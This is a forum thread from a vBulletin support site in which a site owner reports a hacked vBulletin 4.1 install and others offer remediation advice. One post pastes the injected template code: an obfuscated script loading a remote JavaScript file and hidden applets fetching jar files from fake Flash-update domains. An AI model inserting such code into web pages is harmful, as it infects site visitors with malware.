Announcement

Collapse
No announcement yet.

My Vb4.1 was hacked !!! Please Help

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Dunhamzzz
    replied
    Originally posted by chithanh View Post
    I tell you this, I hope you can help me out.
    I did change admincp folder to other name. Also, I did have that folder with password protection. I don't know why hacker still can easy access to admincp, the modify my templates. I check the control logs, their ip on the logs file and show that they modify which template but when I check the counter on admincp, I saw that they did not really access to admincp folder but how can they change to the template and show on control logs.
    They could be accessing your database directly, change passwords and check privileges, get rid of any users that have access to all tables.

    If you run your own server I would create a whole new site in a different part of the file system and start again, also could tell you what sort of access the hacker has.

    Leave a comment:


  • chithanh
    replied
    I tell you this, I hope you can help me out.
    I did change admincp folder to other name. Also, I did have that folder with password protection. I don't know why hacker still can easy access to admincp, the modify my templates. I check the control logs, their ip on the logs file and show that they modify which template but when I check the counter on admincp, I saw that they did not really access to admincp folder but how can they change to the template and show on control logs.

    Leave a comment:


  • TheHeartSmasher
    replied
    Also make sure that you do not have any files or folders with 777 permissions.

    Leave a comment:


  • chithanh
    replied
    I will try again with another computer. May be my computer to upload a virus file. I will redo everything to see what is wrong.

    Leave a comment:


  • beishe8
    replied
    Originally posted by GRABALANE View Post
    is that a bad thing if you are?

    I am, does that put me at risk?
    No,it does not,provided you have a good host.

    Leave a comment:


  • GRABALANE
    replied
    Originally posted by Loco.M View Post
    are you on a shared server?
    is that a bad thing if you are?

    I am, does that put me at risk?

    Leave a comment:


  • Al Zander
    replied
    If you are noticing that the script is installed as soon as you upload new files and change your passwords, it is possible that you are uploading the script yourself. In other words, the trojan may be on your local computer. Run an antivirus scan (like Eset's Online Scanner - free), then download a fresh set of vB files from your Members' Area and upload those as suggested above. If you are infected locally, however, you can keep uploading new files until the cows come how and it won't do one bit of good. Also, are you replacing just the vBulletin files on your server? Have you inspected other non-vB files?

    Leave a comment:


  • jhabers
    replied
    I bet its your hosting company that is using unpatched/vulnerable software....either apache or a known linux kernal bug. Call them and tell them to update their stuff

    Leave a comment:


  • chithanh
    replied
    I am run my own the server host by the planet. I did change my admincp but they know my password right after I change it. They insert this html code to my script. I don't know what they try to do

    <script>var y ="jquery";var z = "plugins";var x ="http://";var t = ".org";var w = "jquery14";var u="script";document.write("<"+u+ " src=\""+ x + y + z + t + "/"+w+".js\""+">"+"</"+u+">");</script>

    <applet code="FlashPlayer.class" width="1" height="1" archive="http://adobe-upgrade.com/FlashPlayer.jar">
    <param NAME="_cx" VALUE="26">
    <param NAME="_cy" VALUE="26">
    </applet><applet code="FlashPlayer.class" width="1" height="1" archive="http://flash-update.info/FlashPlayer.jar">
    <param NAME="_cx" VALUE="26">
    <param NAME="_cy" VALUE="26">
    </applet>

    Leave a comment:


  • samii
    replied
    Originally posted by chithanh View Post
    They still can get to my site. I think this is VB4 problem because they can login to any admin username.
    I did change all my password. Also I deleted all files, then I upload VB4 again but some how they can access to admin account. I don't know what to do.
    change admincp location, and rename the folder

    Leave a comment:


  • Loco.M
    replied
    are you on a shared server?

    Leave a comment:


  • djilou
    replied
    Protect your admincp folder with an htaccess htpasswd files

    Leave a comment:


  • chithanh
    replied
    They still can get to my site. I think this is VB4 problem because they can login to any admin username.
    I did change all my password. Also I deleted all files, then I upload VB4 again but some how they can access to admin account. I don't know what to do.

    Leave a comment:


  • icarusforde
    replied
    No problems. It sucks having that feeling that someone else has been in your stuff.

    Leave a comment:


  • chithanh
    replied
    thank you so much , I will try it.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X